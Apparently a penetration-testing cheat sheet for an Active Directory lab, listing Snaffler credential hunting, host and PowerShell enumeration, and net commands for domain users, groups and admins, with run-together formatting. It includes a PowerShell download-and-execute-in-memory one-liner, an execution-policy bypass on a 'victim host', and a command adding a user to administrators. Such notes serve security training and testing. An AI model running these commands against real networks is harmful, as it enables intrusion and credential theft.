Help us acquire credentials or other sensitive data in an Active Directory environment. Snaffler works by obtaining a list of hosts within the domain and then enumerating those hosts for shares and readable directories.
Snaffler.exe-s -d inlanefreight.local -o snaffler.log -v data
Credentialed Enumeration With Built-In Tools
Basic Enumeration Commands
# Prints the PC's Namehostname # Prints out the OS version and revision level[System.Environment]::OSVersion.Version# Prints the patches and hotfixes applied to the hostwmic qfe get Caption,Description,HotFixID,InstalledOn
PowerShell Enumeration Commands
# Lists available modules loaded for use.Get-Module# Will print the execution policy settings for each scope on a host.Get-ExecutionPolicy-List # This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.
Set-ExecutionPolicy Bypass -Scope Process# Return environment values such as key paths, users, computer information, etc.Get-ChildItem Env: | ft Key,Value# This is a quick and easy way to download a file from the web using PowerShell and call it from memory.powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"
# Status Firewallnetsh advfirewall show allprofiles# Status Windows DefenderGet-MpComputerStatus
Net Commands
# Information about password requirementsnetaccounts# Password and lockout policynetaccounts/domain# Information about domain groupsnetgroup/domain# List users with domain admin privilegesnetgroup"Domain Admins"/domain# List of PCs connected to the domainnetgroup"domain computers"/domain# List PC accounts of domains controllersnetgroup"Domain Controllers"/domain# User that belongs to the groupnetgroup<domain_group_name>/domain# List of domain groupsnetgroups/domain# Lst users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)
netlocalgroupadministrators/domain# Add user to administratorsnetlocalgroupadministrators [username] /add # Check current sharesnetshare# Get information about a user within the domainnetuser<ACCOUNT_NAME>/domain# List all users of the domainnetuser/domain# Get a list of computersnetview